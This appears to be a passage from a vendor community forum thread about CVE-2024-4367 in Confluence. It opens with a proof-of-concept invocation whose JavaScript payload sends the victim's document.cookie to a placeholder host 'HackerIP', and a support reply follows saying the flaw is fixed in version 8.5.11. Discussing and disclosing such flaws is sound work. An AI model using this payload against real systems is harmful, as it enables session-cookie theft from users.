CVE-2024-4367.py "var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://HackerIP:2024/?cookie=' + document.cookie, true); xhr.withCredentials = true; xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { console.log(xhr.responseText); } }; xhr.send();"
------
Hi Yong,
Thank you for reaching out. We can confirm that this vulnerability has been fixed under Confluence 8.5.11 version. So, you can plan to upgrade Confluence and see if you are able to reproduce this behaviour by any chance.
In context of why this is not populating under our Vulnerability Portal, we have initiated a discussion internally to fix this part.
Hope this information helps.
Thanks
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.
Online forums and learning are now in one easy-to-use experience.
By continuing, you accept the updated Community Terms of Use and acknowledge the Privacy Policy. Your public name, photo, and achievements may be publicly visible and available in search engines.
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.